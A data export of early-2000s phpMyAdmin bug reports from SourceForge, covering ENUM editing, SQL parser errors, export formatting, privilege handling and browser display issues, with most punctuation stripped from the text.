A field with the following definition `testfield` enum yes ) default NULL Maybe its a bad flip flop) When editing this field, pMA correctly presents one checkbox for NULL) and one radio button for yes ).
Switching a NULL field to yes with the radio button is ok, but flipping a field set to yes using the the checkbox) to NULL doesn t really NULLifies the field.
Greetings to the pMA Super Team mandabaer Original URL https sourceforge.net p phpmyadmin bugs 963 https sourceforge.net p phpmyadmin bugs 963 Original author mandabaer Found in version 2.5.2","bug"
"24444","7336","JS confirmation appers when not needed.
Situation I have executed some DELETE query and I get back to SQL page.
They I want to either execute bookmarked query or queries from file.
I get JS confirmation whether I want to do that DELETE even thought it will not be executed.
Solution Do more checks in confirmQuery in libraries functions.js.
Anyone to fix this? )
Original URL https sourceforge.net p phpmyadmin bugs 964 https sourceforge.net p phpmyadmin bugs 964 Original author nijel Found in version Latest Git","bug"
"24444","7337","mysql fetch array ) error browsing tables.
I get this error when browsing tables on one of my MySQL servers Warning mysql fetch array ) supplied argument is not a valid MySQL result resource in Library WebServer phpMyAdmin 2.5.2 pl1 libraries mysql wrappers.lib.php on line 36 Warning Variable passed to each ) is not an array or object in Library WebServer phpMyAdmin 2.5.2 pl1 libraries relation.lib.php on line 315 This only started happening with phpMyAdmin 2.5.2 and 2.5.2 pl1.
Did not happen with 2.5.1.
On this one server, the MySQL version is 3.22.32 very old.
So old that I cannot create the PMA history table, because this table contains a field named amp;quot;group amp;quot; which is a reserved word under this version of MySQL.
So while I have all other PMA whatever tables, I don t have the PMA history table.
Don t know if that s related to the problem.
Another MySQL server I have, running 4.0.14 with all the PMA etc tables, does not show this error message when browsing tables in phpMyAdmin 2.5.2 pl1.
Original URL https sourceforge.net p phpmyadmin bugs 965 https sourceforge.net p phpmyadmin bugs 965 Original author ryandesign Found in version 2.5.2 pl1","bug"
"24444","7338","ENUM Drop Down List Error in Insert.
Frop Help forum I have a table with column enum AML , Customer Supplied Item , Documentation , FW , HW , Process Manufacturing) , SW , Test ) It shows up fine in the data dictionary.
When I try to enter values using the PHPMyAdmin insert function, the drop down for this field only shows AML Customer Supplied Item Documentation FW HW Process Manufacturin Original URL https sourceforge.net p phpmyadmin bugs 966 https sourceforge.net p phpmyadmin bugs 966 Original author nijel Found in version Latest Git","bug"
"24444","7339","Cannot delete a user.
Create a user who has no global privs, but only db specific SELECT to db def .
Now try to delete this user, with the option amp;quot;Revoke all active privileges from the users and delete them afterwards amp;quot; the module will try to REVOKE GRANT OPTION on this def db, and it fails.
The other db specific privileges are gone, but the user is not deleted.
Thanks Alexander...
Original URL https sourceforge.net p phpmyadmin bugs 967 https sourceforge.net p phpmyadmin bugs 967 Original author lem9 Found in version Latest Git","bug"
"24444","7340","Updating table list.
After changing the name of a table, the table list is note updated if the left frame.
Original URL https sourceforge.net p phpmyadmin bugs 968 https sourceforge.net p phpmyadmin bugs 968 Original author anonymous Found in version 2.5.3 rc1","bug"
"24444","7341","Server Status Total displays 100,00 .
When reviewing Server Status for MySQL 3.23.54, the Server Traffic Total line displays a total of 100,00 note the comma), despite the rest of the percentages being propery reported in .
format.
The phpMyAdmin language is set to English en iso 8859 1).
I have also checked using a language setting of French, German, Italian, and Russin ru win1251).
In all cases, the same behavior is observed.
It appears to not be internationalized at all.
Original URL https sourceforge.net p phpmyadmin bugs 969 https sourceforge.net p phpmyadmin bugs 969 Original author alex lindsay Found in version 2.5.3 rc1","bug"
"24444","7342","table with over 10,000 records.
i have a table with 14357 rows and phpMyAdmin is only showing 21 pages of 30 rows.
I haven t looked at the code to see if I can see a problem.
The rows it does display are the first 630 that were added.
This did not start happening until I hit 10000 records.
Original URL https sourceforge.net p phpmyadmin bugs 972 https sourceforge.net p phpmyadmin bugs 972 Original author anonymous Found in version 2.5.3 rc1","bug"
"24444","7343","icons on funny place in Netscape 7.0.
Hi there, Only a cosmetic issue.
When using phpMyAdmin 2.5.3 dev 13 Aug 2003) and Netscape 7.0 the icons for Change and Drop are on a funny place they are floating one line above the amp;quot;With selected amp;quot; text and are displaced to far to the right.
With IE 6.0 it is OK. c.u.
Luc Original URL https sourceforge.net p phpmyadmin bugs 974 https sourceforge.net p phpmyadmin bugs 974 Original author lukro Found in version Latest Git","bug"
"24444","7344","SET PASSWORD = PASSWORD ).
When I you to update your root password on a remote server you get this message ============================== SQL query SET PASSWORD = PASSWORD ) MySQL retourneerde Can t find any matching row in the user table Original URL https sourceforge.net p phpmyadmin bugs 975 https sourceforge.net p phpmyadmin bugs 975 Original author vanbroup","bug"
"24444","7345","CREATE DATABASE on remote).
The create database option is not available on a remote server when you are on a remote server.
no permissions) The CREATE DATABASE query works fine.
Original URL https sourceforge.net p phpmyadmin bugs 976 https sourceforge.net p phpmyadmin bugs 976 Original author vanbroup","bug"
"24444","7346","Comments on a multi table SELECT.
When you execute a multi table SELECT, the comments for the tables are incorrect.
Specifically, only the comments for the first table in the SELECT are displayed.
If the column names match in subsequent tables, they get incorrect titles; if the column names don t match, no comment appears.
To reproduce 1\.
Execute the attached SQL code to create a test database.
Make sure that the comments are set as indicated in the dump.
2\.
In the newly created test database, execute the following SQL SELECT FROM table1,table2 3\.
The query should display table1.TestText and table2.TestText.
Expected Results The comments under the column headers should read amp;quot;This is the TestText column from Table1.
amp;quot; and amp;quot;This is the TestText column from Table2.
amp;quot; Actual Results Both comments read amp;quot;This is the TestText column from Table1.
amp;quot; the first table specified in the query) Original URL https sourceforge.net p phpmyadmin bugs 977 https sourceforge.net p phpmyadmin bugs 977 Original author cwhiz Found in version 2.5.2 pl1","bug"
"24444","7347","selecting from a table, and erasing limit.
By using select from the table menu, and then erasing the number of rows limit and submitting will cause a syntax error.
Should be easy to fix since its adressed elsewhere by a pop up message if its no number.
Original URL https sourceforge.net p phpmyadmin bugs 978 https sourceforge.net p phpmyadmin bugs 978 Original author sarok Found in version 2.5.3","bug"
"24444","7348","MySQL Error rewriting of BINARY comparison.
Bug is actually still in 2.5.3 rc2, but no Group yet for that) If one tries to use the BINARY operator on a comparison inside of a Query that you input, then it is rewritten to something that causes an error.
How to repeat 1\.
Click on Query Window link to open Query Window 2\.
Input a query that uses the BINARY keyword for a comparison, such as SELECT FROM mysql.user WHERE BINARY user= amp;quot;root amp;quot; 3\.
Click on GO.
4\.
Watch error come up on screen, which shows it rewritten to WHERE BINARYuser = amp;quot;root amp;quot;.
You can work around it as a short term solution by putting backticks around the column name, so it gets written to BINARY`user` which will allow the query to work.
Original URL https sourceforge.net p phpmyadmin bugs 979 https sourceforge.net p phpmyadmin bugs 979 Original author harrisonf Found in version 2.5.3 rc2","bug"
"24444","7349","Error with LIMIT row count = 1.
I receive an error with the following SELECT Expression in my PhpMyAdmin Version 2.5.1 and in your current online demo SELECT FROM PMA bookmark LIMIT 0, 1 Error SQL Befehl SELECT FROM PMA bookmark LIMIT 0 , 1 MySQL meldet 1064 You have an error in your SQL syntax near 1 at line 3 Original URL https sourceforge.net p phpmyadmin bugs 980 https sourceforge.net p phpmyadmin bugs 980 Original author anonymous Found in version 2.5.1","bug"
"24444","7350","Export data v2.5.2pl1.
Selecting export as Excel CSV format does not show a check box for amp;quot;put field names at first row amp;quot;.
The fix is easy, copy 2 lines from the end of the CSV section to the end of the Excel section in display export.inc.php.
Specifically, lines 287 and 288 need to be inserted after line 304.
This is necessary for us, as we use the csv file for importing data into an Access database, and we need field names.
It s much easier to use the Excel export option than useing the straight CSV export, which requires additional knowlege for people that are not experts at this sort of stuff.
Original URL https sourceforge.net p phpmyadmin bugs 985 https sourceforge.net p phpmyadmin bugs 985 Original author anonymous","bug"
"24444","7351","Extended inserts.
the rows of extended insert are separated by a amp;quot;; amp;quot; not a amp;quot;, amp;quot; .
phpMyAdmin SQL Dump version 2.5.2 dev http www.phpmyadmin.net Host Generation Time Aug 22, 2003 at 10 42 AM Server version 4.1.0 PHP Version 4.3.3RC1 Database `sve` Dumping data for table `tbl exp` INSERT INTO `tbl exp` VALUES value 1 , value 2 ); value 3 , value 4 ); Original URL https sourceforge.net p phpmyadmin bugs 981 https sourceforge.net p phpmyadmin bugs 981 Original author anonymous","bug"
"24444","7352","foreign field empty when editing record.
When editing a row in a table, which have foreign keys to a table that has more than 200 entries, the value of the foreign keys input fields Browse foreign values) are empty.
So when you press the Go button the values are lost!
Original URL https sourceforge.net p phpmyadmin bugs 982 https sourceforge.net p phpmyadmin bugs 982 Original author j0erch Found in version 2.5.3 rc2","bug"
"24444","7353","DB amp;gt; Query with relation shows wrong db.
In 2.5.2 pl1 using 4.0.14 mysql, when I click on Home amp;gt; select DB in this case dbname is amp;quot;crt amp;quot;) amp;gt; Query tab, I get the image displayed below.
The problem is that under the amp;quot;Use Tables amp;quot; select, I only see the tables in the mysql database.
I assumed that I would see the tables from my amp;quot;crt amp;quot; database.
I read FAQ 6.6, and still got this problem.
I m attaching a screenshot in a web friendly yet copyrighted format.
Original URL https sourceforge.net p phpmyadmin bugs 983 https sourceforge.net p phpmyadmin bugs 983 Original author ooglek Found in version 2.5.2 pl1","bug"
"24444","7354","2.5.3 rc2) Can t update MAX QUERIES PER HOUR.
create a user with MAX QUERIES PER HOUR = 10 want to update with MAX QUERIES PER HOUR = 0 after clicking GO MAX QUERIES PER HOUR still = 10 MOZILLA 1.4 PHP 4.3.2 mysqld Ver 4.0.11a gamma for mandrake linux gnu on i586 Original URL https sourceforge.net p phpmyadmin bugs 984 https sourceforge.net p phpmyadmin bugs 984 Original author anonymous Found in version 2.5.3 rc2","bug"
"24444","7355","Default export selection doesn t work for xml.
[from https sourceforge.net forum forum.php?thread id=925725 amp;amp;forum id=72909 ] hi all, when i set cfg[ Export ][ format ] = xml ; the export page loads with sql checked.... the other options work latex etc...) just not xml.
i tried this in the latest rc and the pl1 stable... could this be a bug?
thanks greg Original URL https sourceforge.net p phpmyadmin bugs 986 https sourceforge.net p phpmyadmin bugs 986 Original author nijel","bug"
"24444","7356","Lots of warnings with 2.5.3 rc3.
Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Notice Undefined index D in home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php on line 38 Warning Cannot modify header information headers already sent by output started at home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php 38) in home httpd htdocs phpMyAdmin libraries ob.lib.php on line 65 Warning Cannot modify header information headers already sent by output started at home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php 38) in home httpd htdocs phpMyAdmin libraries header http.inc.php on line 14 Warning Cannot modify header information headers already sent by output started at home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php 38) in home httpd htdocs phpMyAdmin libraries header http.inc.php on line 15 Warning Cannot modify header information headers already sent by output started at home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php 38) in home httpd htdocs phpMyAdmin libraries header http.inc.php on line 16 Warning Cannot modify header information headers already sent by output started at home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php 38) in home httpd htdocs phpMyAdmin libraries header http.inc.php on line 17 Warning Cannot modify header information headers already sent by output started at home httpd htdocs phpMyAdmin libraries mysql charsets.lib.php 38) in home httpd htdocs phpMyAdmin libraries header http.inc.php on line 20 Original URL https sourceforge.net p phpmyadmin bugs 987 https sourceforge.net p phpmyadmin bugs 987 Original author bergmann","bug"
"24444","7357","[MySQL 3.22.32] Special chars in table names cause problems.
Please forgive the convoluted bug report.
There are several things wrong here, but I m not sure how to split it up into multiple bugs, since it s all related.
The original problem is that MySQL tables whose names contain special characters cannot be browsed in current versions of phpMyAdmin.
This is in MySQL 3.22.32 on a PC under SuSE Linux 7, I think).
I just discovered this in a database created by the web design company where I work.
The database was created years ago, and as both the web design company and the client are German, the table names were written in German some using special characters that occur in the German language, such as xc3xbc u with two dots above) and xc3x9f German double S character; what others might call a Beta).
Browsing these tables in phpMyAdmin 2.2.0 from August 2001) works fine, but using 2.4.0, 2.5.1, 2.5.2 pl1, and 2.5.3 rc3 produces the following errors ERROR!
Warning reset ) Passed variable is not an array or object in var www vhosts admin htdocs phpMyAdmin 2.5.3 rc3 libraries display tbl.lib.php on line 1647 ERROR!
Warning Variable passed to each ) is not an array or object in var www vhosts admin htdocs phpMyAdmin 2.5.3 rc3 libraries display tbl.lib.php on line 1648 ERROR!
Warning reset ) Passed variable is not an array or object in var www vhosts admin htdocs phpMyAdmin 2.5.3 rc3 libraries display tbl.lib.php on line 927 ERROR!
Warning Variable passed to each ) is not an array or object in var www vhosts admin htdocs phpMyAdmin 2.5.3 rc3 libraries display tbl.lib.php on line 928 ERROR!
Warning reset ) Passed variable is not an array or object in var www vhosts admin htdocs phpMyAdmin 2.5.3 rc3 libraries display tbl.lib.php on line 1170 ERROR!
Warning Variable passed to each ) is not an array or object in var www vhosts admin htdocs phpMyAdmin 2.5.3 rc3 libraries display tbl.lib.php on line 1171 Notes In phpMyAdmin 2.5.3 rc3, there is no problem creating tables using special characters like u with umlaut) on MySQL 3.22.32, or renaming tables such that they contain these characters.
Exporting seems to work too.
The only problem seems to be browsing.
There is no problem selecting from this table when using the MySQL command line.
Further testing shows that MySQL 4.0.3 log on a PC with Red Hat 7, I think) has no problems creating, renaming, or browsing these tables.
Even further testing on MySQL 4.0.14 standard on a G4 with Mac OS X 10.2.6 shows that it cannot create tables with these names, nor can it rename tables to be named like this, so I cannot determine if phpMyAdmin can work with them on this server version.
Don t know if this is a MySQL 4.0.14 issue or a Mac OS X issue.
Finally, in phpMyAdmin 2.5.1 I also got this error when browsing the tables on MySQL 3.22.32 There is a chance that you may have found a bug in the SQL parser.
Please examine your query closely, and check that the quotes are correct and not mis matched.
Other possible failure causes may be that you are uploading a file with binary outside of a quoted text area.
You can also try your query on the MySQL command line interface.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem.
If you still have problems or if the parser fails where the command line interface succeeds, please reduce your SQL query input to the single query that causes problems, and submit a bug report with the data chunk in the CUT section below BEGIN CUT eNodjrFugzAURXd xR0yReDYBlLyNoTcNJKNiU0zZIMWqUhRSkGp0n PUNr5Hp1ztffOE0qJUsHo iiBTyAwyZ6FZhgdj5SkQVod3wvx1Gdtp7id GTo fozRNyR ElBCJBux3QgJlZDYUbrF1Ha3Gfo YsXsTzgaQsKV4olir8HDhQjFXldNhJNeQrZ9g3XngzEFMi5YbQuC 4hmXrH6p 5jILT9Svkhghuvt zkxR7Qn9NR7mzzjPs10s2X8naKPLBms8e2fx6PrpF8J O8I= END CUT BEGIN RAW ERROR C1 C2 LEN 14 15 18 STR xc3xbc CVS Id sqlparser.lib.php,v 1.70 2003 06 01 23 09 46 rabus Exp MySQL 3.22.32 USR OS, AGENT, VER Mac MOZILLA 5.0 PMA 2.5.1 PHP VER,OS 4.3.2 Linux LANG en iso 8859 1 SQL SELECT FROM xc3xbcber But this error is no longer present in 2.5.2 pl1 or 2.5.3 rc3.
It was probably a mistake for us to have included special characters in the table names.
Therefore I would suggest that phpMyAdmin should work properly for tables named like this, but display a warning message recommending to the user that they choose a name with only legal ASCII characters.
Original URL https sourceforge.net p phpmyadmin bugs 988 https sourceforge.net p phpmyadmin bugs 988 Original author ryandesign Found in version 2.5.3 rc2","bug"
"24444","7358","Parser runs out of memory on extended inserts.
I have 2 databases, 1 live, 1 test.
I sync them up by doing a full dump from the live with drop tables ), then a full replacement upload.
Whenever I do this full dump to my test database, I get this error Your SQL query has been executed successfully Fatal error Allowed memory size of 25165824 bytes exhausted tried to allocate 410841 bytes) in var www phpMyAdmin 2.5.3 libraries sqlparser.lib.php on line 308 All my data is imported fine, it just loads my server till the 25Mb limit is hit.
The amount it tries to allocate chagnes, but is usually in the high 300000 to low 400000 bytes.
I m running debian woody linux, apache 1.3.26, mysql 3.23.49, php 4.1.2 all from debian apt) and phpMyAdmin 2.5.3 self untar).
Heres my database, if you want to test it out I ve replaced all sensitive info w junk data).
http home.socal.rr.com epit test.sql.gz 80k) also attached to bug report) The database is NOT big by any means I think in phpMyAdmin size total it says 600k), and is reproducable every time, regardless of import type gz, zip, text, put entire contents into SQL window).
In IE6, I get this error.
Using Mozilla Firebird latest nightly) it just times out and I get a blank right panel.
Original URL https sourceforge.net p phpmyadmin bugs 993 https sourceforge.net p phpmyadmin bugs 993 Original author epit","bug"
"24444","7359","Action icon tool tips and Safari.
Apple s Safari browser 1.0 does not show the tooltips you ve programmed in for the new Action icons in 2.5.3 rc3.
If you re saying amp;quot;but Safari doesn t show tooltips anyway, amp;quot; well, it kinda does if you turn on the status bar in the View menu, you get the text of the tooltip at the lower left of the browser window.
Not as good as a tooltip, but it s something.
But, your tooltips don t work, because you ve programmed them in using the amp;quot;title amp;quot; attribute of the amp;quot;img amp;quot; tag.
Safari doesn t make use of that attribute when it s in an amp;quot;img amp;quot; tag.
For Safari compatibility, I d request that you add the amp;quot;title amp;quot; attribute to the amp;quot;a amp;quot; link) tag as well, which Safari does use.
I ve already reported this bug to Apple but it ll probably be awhile before we get an updated Safari to correct this.
I ve also requested that Safari should show normal tooltips like everyone else instead of this status bar nonsense.
We ll see if they listen.
Original URL https sourceforge.net p phpmyadmin bugs 989 https sourceforge.net p phpmyadmin bugs 989 Original author ryandesign Found in version 2.5.3 rc2","bug"
"24444","7360","Error in php code generation.. Hi, I am Vincenzo and my email is ervincio tiscali.it.
I probably find a bug in phpMyAdmin, version 2.5.1.
When I do a query and I ask phpMyAdmin to create for me php code, he returns me query SQL [Modifica] [Spiega SQL] [senza codice PHP] [Invia Query] Italian ;)) sql = SELECT IDUtente, Nickname AS NOME ; sql .= FROM utenti LIMIT 0, 30 ; when there isn t space between AS clause and FROM.
Bye, Vinz Original URL https sourceforge.net p phpmyadmin bugs 990 https sourceforge.net p phpmyadmin bugs 990 Original author anonymous","bug"
"24444","7361","One moreover AND when deleting editing record.
When I try to delete a single row from a table I browse the table, then click on the dustbin on a particular row), I get the following error 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near LIMIT 1 at line 1 I had a much older version 2.2.6) before upgrading, and the only difference that I can see is that it puts an AND into the SQL code.
SQL DELETE FROM `test` WHERE `id` = 6 AND `text` = blah blah blah AND LIMIT 1 I have manually typed the SQL in by hand and it doesn t work until you remove the AND from the SQL Code.
The previous version I had before was 2.2.6 where it worked.
I just upgraded to 2.5.3rc3.
The version of mySQL i am using is reported as 4.0.14.
I have gone back to version 2.5.0 and it all works ok, the AND isn t in the SQL delete statement.
I hope I have included enough information, please contact me if further details is required.
Thanks, Tony.
Original URL https sourceforge.net p phpmyadmin bugs 991 https sourceforge.net p phpmyadmin bugs 991 Original author aod topcat Found in version Latest Git","bug"
"24444","7362","No LOCK TABLES in DB specific privileges.
In 2.5.3 the Lock tables priv priv is not shown in the DB specific privs.
I use Dutch language inside phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin bugs 992 https sourceforge.net p phpmyadmin bugs 992 Original author olafvdspek Found in version 2.5.3","bug"
"24444","7363","Undefined variable prev index in browse mode.
When browsing a table, I get this error Notice Undefined variable prev index in [pma dir] libraries display tbl.lib.php3 on line 495 Original URL https sourceforge.net p phpmyadmin bugs 994 https sourceforge.net p phpmyadmin bugs 994 Original author rabus Found in version Latest Git","bug"
"24444","7364","Protect POST variables against cookies.
In 2.5.3 when I edit a char varchar field, the length is always set to 1 although I set it to 127) ALTER TABLE `xwi clans` CHANGE `site` `site` CHAR 1 ) NOT NULL Original URL https sourceforge.net p phpmyadmin bugs 998 https sourceforge.net p phpmyadmin bugs 998 Original author olafvdspek","bug"
"24444","7365","column name order doesn t match data order.
I checked but didn t find a similar bug listed, hope I was right...
Versions phpMyAdmin 2.4.0 MySQL 3.23.54 log Linux 2.4.20 4 SMP Sat Mar 29 15 12 26 PST 2003 i686 Description The column names of data upon an SQL query that re orders the columns work fine in the pretty view, but when you click export at the bottom of the page, and click the Put fields names at first row button for CSV export, then the field names will be in the order that they are installed in the database, not in the order that they were listed in the query.
To reproduce try the following ========== CREATE TABLE test table id int 10) unsigned NOT NULL auto increment, stat varchar 7) default NULL, location char 3) default NULL, region varchar 8) default NULL, PRIMARY KEY id) ) TYPE=MyISAM; INSERT INTO test table VALUES 1, 2 , 3 , 4 ); INSERT INTO test table VALUES 2, 2 , 4 , 5 ); ========= SELECT id,location,stat,region FROM test table; ========= click on export at the bottom of the page, click on CSV Data and Put field names at first row , note the following output ========= amp;quot;id amp;quot;; amp;quot;stat amp;quot;; amp;quot;location amp;quot;; amp;quot;region amp;quot; amp;quot;1 amp;quot;; amp;quot;3 amp;quot;; amp;quot;2 amp;quot;; amp;quot;4 amp;quot; amp;quot;2 amp;quot;; amp;quot;4 amp;quot;; amp;quot;2 amp;quot;; amp;quot;5 amp;quot; ========= look carefully, you ll notice that amp;quot;stat amp;quot; is listed 2nd, which is it s position in the CREATE TABLE command, but is not the correct position in the SELECT command.
More importantly, note for the first data line, for example, as entered in the INSERT statement is 1,2,3,4 not 1,3,2,4 as listed correctly) in the query result, so the column names do not match the actual data....
Very confusing!!
I believe that the Put field names at first row feature is implemented without respect to the query that is being exported... Todd trope mrv.com Original URL https sourceforge.net p phpmyadmin bugs 995 https sourceforge.net p phpmyadmin bugs 995 Original author anonymous Found in version 2.4.0","bug"
"24444","7366","The db schema is always in color.
I don t know if this is a bug, but any PDF file that is generated that has the DB schema in it, has color in the tables, and I don t think they should unless you select color.
Original URL https sourceforge.net p phpmyadmin bugs 996 https sourceforge.net p phpmyadmin bugs 996 Original author rebelkell","bug"
"24444","7367","SQL History amp;amp; LockFromUpdate.
When the amp;quot;Do not overwrite this query from outside the window amp;quot; in Query Frame is checked, this SQL query isn t save in SQL History ... S ... THX ...
Original URL https sourceforge.net p phpmyadmin bugs 997 https sourceforge.net p phpmyadmin bugs 997 Original author jenix","bug"
"24444","7368","Opera 7.20 messes up row markers.
I just installed Opera 7.20 final for Windows.
And now the hover and click color changes in the database browser don t work.
The problem is that this new version of Opera changes colors specified as XXXXXX in the HTML to rgb nnn,nnn,nnn) in the DOM.
No matter what.
So, I ve attached a patch unified diff) for functions.js.
It basically detects the rgb format and converts it.
There might be a slicker way to do it, but this way works.
I don t know if the problem exists in Opera 7.20 for Linux yet.
I ll wait for the final release.
I m also sending corresponding bug reports into Opera for this and other rendering bugs) Michael Original URL https sourceforge.net p phpmyadmin bugs 1003 https sourceforge.net p phpmyadmin bugs 1003 Original author redbeardc Found in version 2.5.3","bug"
"24444","7369","SQL export of relations broken.
Firstly, I don t know what I report here whether a bug or the other one.
Secondly, I don t know to whom I should tell about this problem, so I decide to tell first about this to phpMyAdmin developer team.
Generally, I have a problem with SQL scheme which is created by PMA 2.5.3).
In my case, I have referencial integrity rules between tables; I uses InnoDB table type.
PMA run smoothly when I try to dump the scheme.
